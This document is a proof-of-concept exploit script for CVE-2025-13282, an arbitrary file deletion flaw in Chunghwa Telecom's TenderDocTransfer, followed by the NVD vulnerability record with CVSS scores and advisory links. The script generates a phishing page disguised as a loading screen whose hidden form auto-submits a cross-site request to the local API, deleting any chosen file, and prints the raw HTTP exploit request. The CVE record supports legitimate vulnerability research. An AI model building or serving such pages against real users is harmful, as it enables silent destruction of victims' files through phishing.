CVE-2025-13282

#!/usr/bin/env python3 """ CVE-2025-13282 PoC - TenderDocTransfer Arbitrary File Delete Note: This is for educational and security research purposes only. """ import http.server import socketserver from urllib.parse import parse_qs # Malicious HTML page that exploits CSRF + Path Traversal MALICIOUS_HTML = '''<!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Page is loading, please wait...</h1> <form id="exploit" action="http://target:8080/api/delete" method="POST" style="display:none;"> <input type="hidden" name="filepath" value="/etc/passwd"> <input type="hidden" name="confirm" value="true"> </form> <script> // Auto-submit form to exploit CSRF + Path Traversal document.getElementById('exploit').submit(); </script> </body> </html>''' def create_phishing_page(target_file): """Generate phishing page with malicious request""" return MALICIOUS_HTML.replace('/etc/passwd', target_file) # Exploit request example (for reference) EXPLOIT_REQUEST = '''POST /api/delete HTTP/1.1 Host: target:8080 Content-Type: application/x-www-form-urlencoded filepath=/etc/passwd&confirm=true''' if __name__ == "__main__": print("="*60) print("CVE-2025-13282 PoC - TenderDocTransfer Arbitrary File Delete") print("="*60) print("\n[1] Malicious HTML Page Content:") print("-"*60) print(create_phishing_page("/etc/passwd")) print("\n[2] HTTP Request to Delete Arbitrary File:") print("-"*60) print(EXPLOIT_REQUEST) print("\n[3] Attack Scenario:") print("-"*60) print("1. Attacker hosts malicious HTML page") print("2. Victim visits the page while TenderDocTransfer is running") print("3. Browser automatically sends CSRF request to target API") print("4. API deletes the specified file without CSRF validation") print("5. Result: Arbitrary file deletion on victim's system")

{"cve": {"id": "CVE-2025-13282", "sourceIdentifier": "[email protected]", "published": "2025-11-17T04:15:54.543", "lastModified": "2025-12-19T17:02:10.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TenderDocTransfer developed by Chunghwa Telecom has a Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user's system."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-36"}, {"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cht:tenderdoctransfer:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.41.159", "matchCriteriaId": "5E474265-3B59-4B3C-AAAD-87E8F1C7995C"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10511-10f3a-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10510-3719c-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}